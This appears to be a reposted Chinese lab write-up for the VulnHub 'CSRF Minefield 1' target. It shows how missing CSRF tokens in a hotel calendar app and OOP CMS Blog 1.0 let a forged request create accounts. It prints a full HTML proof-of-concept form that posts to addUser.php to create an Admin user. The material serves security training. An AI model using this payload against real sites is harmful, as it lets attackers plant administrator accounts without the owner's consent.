CSRF Minefield 1靶场渗透
程序员文章站
2022-05-17 16:46:07
...
靶场下载链接 https://www.vulnhub.com/entry/csrf-minefield-1,316/
两处漏洞
第一处:访问http://192.168.110.208/hotelcal/admin/add_account.php
原始密码 admin . admin
1.首先访问网站点击创建一个新用户
2.创建完账户之后使用bp拦截抓去数据包
3.发现没有使用Cookie token,将其数据包发送给burpsuite插件CSRF POC(burpsuite里可下载)可自行改密码账号,如下:
4.将生产的POC保存为csrfpoc.htm 或者直接复制地址进行访问,就成功创建用户
第二处:
访问http://192.168.110.208/oop/admin/addUser.php
原始密码admin . 123
首先我是在https://www.exploit-db.com/里面搜的OOP CMS Blog 1.0发现有一个是创建管理员,现在进行实现:
1.我先把上面的poc给下载下来 之后把他的ip、路径改成我自己的,最后生成一个html文件。
# POC:
# 2)
# http://192.168.110.208/oop/admin/addUser.php
#
<html>
<body>
<form action="http://192.168.110.208/oop/admin/addUser.php" method="post" enctype="multipart/form-data">
<table class="form">
<tbody><tr>
<td>
<label>User Name</label>
</td>
<td>
<input name="userName" placeholder="Enter User Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>Full Name</label>
</td>
<td>
<input name="name" placeholder="Enter User Full Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>User Password</label>
</td>
<td>
<input name="password" placeholder="Enter User Password..." type="text">
</td>
</tr>
<tr>
<td>
<label>Email</label>
</td>
<td>
<input name="email" placeholder="Enter User Email..." type="text">
</td>
</tr>
<tr>
<td>
<label>Details</label>
</td>
<td>
<textarea name="details"></textarea>
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td></td>
<td>
<input name="submit" value="Create" type="submit">
</td>
</tr>
</tbody>
</table>
</form>
</body>
</html>
2.点击生成的文件,如图:
3.进行输入用户,密码、选择管理员之后点击提交,他会自动跳转到创建用户的页面,发现他提示创建成功
上一篇: php Swoole扩展安装
下一篇: php7.2安装ldap扩展模块